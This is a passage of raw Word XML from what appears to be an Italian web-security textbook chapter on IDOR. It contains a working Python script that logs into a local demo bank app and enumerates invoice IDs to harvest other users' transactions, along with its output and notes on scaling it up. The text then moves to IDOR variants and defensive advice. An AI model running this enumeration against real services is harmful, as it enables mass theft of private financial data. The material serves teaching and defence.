        <w:t xml:space="preserve"> requests.Session()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">risposta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessione.post(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:hyperlink r:id="rId44">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/login</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                         data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Dashboard"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risposta.text:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Login fallito"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    exit(</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Login OK come mario. Avvio esfiltrazione...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tenta di scaricare le fatture da ID 1 a ID 1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fattura_id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1001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessione.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"</w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/fattura/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fattura_id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r.status_code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Fattura non trovata"</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r.text:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Estrazione brutale dei campi con regex</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        intestatario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> re.search(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">r"Intestatario:&lt;/b&gt;\s*(\S+)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, r.text)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        descrizione  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> re.search(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">r"Descrizione:&lt;/b&gt;\s*([^&lt;]+)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, r.text)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        importo      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> re.search(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">r"Importo:&lt;/b&gt;\s*([+-]?\d+\.\d+)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, r.text)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> intestatario </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> descrizione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> importo:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"Fattura </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fattura_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:&gt;4}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> — utente: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">intestatario</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:&lt;10}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"importo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">importo</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:&gt;10}</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descrizione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserv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Esfiltrazione completata."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installa la libreria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se non l’hai già fatto:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avvia (con l’app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in esecuzione in un altro terminale):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python esfiltratore.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output (in qualche secondo):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Login OK come mario. Avvio esfiltrazione...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    1 — utente: mario      importo:    3200.00 €  (Bonifico stipendio Anthropic SRL)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    2 — utente: mario      importo:     -89.00 €  (Pagamento abbonamento sicurezza)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    3 — utente: giulia     importo:    2150.00 €  (Bonifico stipendio FIAT-Stellantis)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    4 — utente: giulia     importo:    -134.50 €  (Bolletta gas Edison)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    5 — utente: giulia     importo:    -780.00 €  (Rata mutuo INTESA SP)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    6 — utente: marco      importo:   12500.00 €  (Vendita azioni ENEL)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    7 — utente: marco      importo:   -2400.00 €  (Tassa successione)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    8 — utente: luca       importo:     980.00 €  (Pensione INPS)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fattura    9 — utente: luca       importo:    -512.00 €  (Pagamento RC Auto Allianz)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Esfiltrazione completata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai appena estratto l’intero database delle transazioni della</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">banca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, autenticato con il singolo account di un cliente normale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quindici righe di codice. Cinque secondi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Su un’applicazione reale con un milione di utenti e dieci milioni di fatture, lo stesso script in poche ore esfiltra tutto. Aggiungi un po’ di parallelismo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aiohttp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e parli di minuti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Questo è esattamente cosa hanno fatto in tutti i casi reali della </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_6_2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 6.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il First American da 885 milioni di documenti, l’Optus da 9,8 milioni di clienti, il T-Mobile da 37 milioni: stesso identico schema. Trovi un IDOR, scrivi 15 righe di Python, automatizzi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Da questo momento in avanti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ogni volta che scrivi un endpoint che prende un parametro come ID di una risorsa, devi chiederti:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa succede se uno script enumera questo endpoint da ID 1 a 10 milioni?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se la risposta è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scarica tutto il database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, hai un IDOR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="264"/>
    <w:bookmarkEnd w:id="265"/>
    <w:bookmarkStart w:id="271" w:name="le-varianti-di-idor"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="516" w:name="sec_6_6"/>
      <w:r>
        <w:t xml:space="preserve">6.6 Le varianti di IDOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="516"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il caso visto finora è il più classico:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR su ID numerico nell’URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ma esistono altre varianti, tutte basate sullo stesso principio (riferimento diretto + controllo mancante).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="266" w:name="variante-1-idor-su-uuid"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variante 1: IDOR su UUID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alcuni programmatori, scoprendo l’IDOR, pensano:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Se gli ID non sono numeri sequenziali ma stringhe casuali, l’attaccante non può enumerarli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per esempio, sostituire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/8e7a13f4-2c5d-4a91-b3e6-7f2c1d9a8b5e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’idea ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">un fondo di verità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— un attaccante esterno che non conosce nessun UUID non può tirare a indovinare in tempi ragionevoli — ma:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Gli UUID si recuperano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Bastano: log condivisi, link inviati per email che restano nelle cronologie, screenshot postati pubblicamente, fughe di dati ad-hoc, integrazione con servizi esterni che ricevono gli UUID. Una volta che l’attaccante ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
